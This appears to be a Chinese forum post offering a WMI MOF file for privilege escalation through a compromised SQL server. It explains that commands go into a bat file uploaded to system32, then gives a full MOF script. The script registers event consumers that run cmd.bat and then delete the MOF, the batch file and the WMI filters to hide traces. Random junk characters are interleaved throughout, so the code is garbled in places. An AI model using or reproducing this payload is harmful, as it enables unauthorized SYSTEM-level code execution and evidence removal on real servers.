这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 @3 n: t% [" l需要将要运行的命令写入到bat上传到system32目录,然后执行。
, t8 {# C( Q$ L1 [0 Z& v5 r* n% A q P- l7 E
这个sql提权MOF需要运行 system下的文件,不能定义路径。2 O! Y. C9 w! s" t1 f5 X6 ^% d
需要将要运行的命令写入到bat上传到system32目录,然后执行。
* ?) P- Y s4 N5 q) J' ^9 X% R4 o& q
& q' j/ H: o1 y* M#pragma8 H7 B D" A- m6 @
namespace("\\\\.\\root\\cimv2")# ~: v% g# ?6 X3 I: O" P& s
class+ j. o3 q( X( `; X9 C
MyClass547! t3 w1 ]$ d; N# b' ]
{ [key]* U8 V/ w# t6 q( C+ P
string1 T5 D$ i. r ^: V3 r8 f
Name;- ^2 U: O, I7 J- ?" O5 B
};
5 P3 |. s+ r, P+ | class7 l" K( h$ J4 @- j0 {# l
ActiveScriptEventConsumer1 f9 b: a1 e' q/ Q7 ]' v; x/ h A
: __EventConsumer { [key]
. |& [+ x( U3 h8 z4 y8 |, s* u/ l/ O$ p string8 @8 F) g8 P# V4 k4 S% A0 o& E- S
Name; [not_null]
- f b X6 [; {# @" j string' [) t. S" n6 R# U+ _/ V1 g, R4 v
ScriptingEngine; string
0 L# r# k) k0 V. C* S ScriptFileName; [template]. A) j% ^6 j6 w$ r, [# q5 b6 M" h
string9 ` m/ e% x8 X( x
ScriptText; uint32 KillTimeout;' ~% C7 n. D3 }, g- h; S' W4 t
}; instance of __Win32Provider as $P {
8 |; Y) `) \; f/ v/ V* U Name
4 U: l) k- a! r: ~ =- {8 p! i6 b0 M, \5 H1 Z
"ActiveScriptEventConsumer"; CLSID =6 }& A. m0 a6 n( I! b- J0 v. F: B
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* A$ @; C* q; ^/ M7 ?0 ] PerUserInitialization: Q" p4 } v" C' g- \' H
= TRUE;' V6 N% ?! d6 z, Q$ P) R! \
}; instance of __EventConsumerProviderRegistration { Provider
, z9 @3 v W9 M# C = $P; ConsumerClassNames' Z5 n7 k. a2 C. _* |& F$ g4 `) L
=/ X6 a; ^7 c# J* b2 h7 x
{"ActiveScriptEventConsumer"};6 F f1 g5 k) X& Q# ~
};9 v# H5 C0 z6 ~) W2 ?; [
Instance of ActiveScriptEventConsumer0 K- _" O6 }4 Q, c" N$ O. p) e4 v
as $cons { Name1 n6 A: K# M" I# L( X' g% }
=
6 ?% q/ U& _2 z6 A6 w% N: ? "ASEC"; ScriptingEngine
p$ V5 m6 e# ?0 }+ s% q =
4 K1 N) u2 k f0 v% l p# D, P "JScript"; ScriptText9 r4 |% r- R1 T0 J: w. r
=, X4 b) J7 ~& S8 u& t
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };' z. g$ i* O4 X! t- m
Instance of ActiveScriptEventConsumer e0 S! c5 b$ t+ w: V
as $cons2 { Name
+ S7 T9 }0 u" R* }( n% G- p =. i! D7 u% B% U0 J( p' s
"qndASEC"; ScriptingEngine0 v: {, h; N8 i" s- c
=
7 u9 L6 H7 J4 o3 T( u "JScript"; ScriptText
5 s4 j t. Y) R0 z = X( ]1 L9 A, J! _; m0 c
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";5 U6 \5 L) ]' A/ Z( U. a% O
}; instance of __EventFilter as $Filt { Name; y5 n* C4 e( E+ T$ ~& N) K5 V, i
=
1 E1 o" g1 J: Q "instfilt"; Query
2 U8 w2 b2 _8 | =; t' V8 C+ S8 a+ A7 q6 L9 R
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage/ N+ K' ~& S# c9 s7 v' ~
=
. A9 N9 S+ J' o; G. k7 T. { "WQL"; }; instance of __EventFilter as $Filt2 { Name
0 V5 ~! z6 F: E& Q$ I =
5 z8 x: I0 @! T, B1 L& ] "qndfilt"; Query
* E$ S8 u) ?$ p1 _0 X- X =- b; l% }# C0 z( |# e, I
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
5 z! W, H' K1 x1 J =
5 K: a* ?2 A8 ~* }' U" ?6 z9 i "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer' M: c; I% P) ^/ A) [5 i$ Q+ Q' N
= $cons; Filter
8 R/ Z; L- D4 c1 w = $Filt;
7 U* o5 T" Q* z- w( A8 x7 y }; instance of __FilterToConsumerBinding as $bind2 { Consumer3 v+ a! o- A- P) K! r/ m/ Z
= $cons2; Filter) k% k6 a+ }# y z1 c4 C% S
= $Filt2;; F1 ~4 J2 H" e- N! e2 P
}; instance of MyClass547# S& V. S8 h- D2 N9 F9 T7 C
as $MyClass { Name
( x1 N0 B. H' S4 r0 ^% {& N =
* l$ Q+ J6 S# H& x "ClassConsumer";8 t/ K1 t5 Y. Q+ _
}; |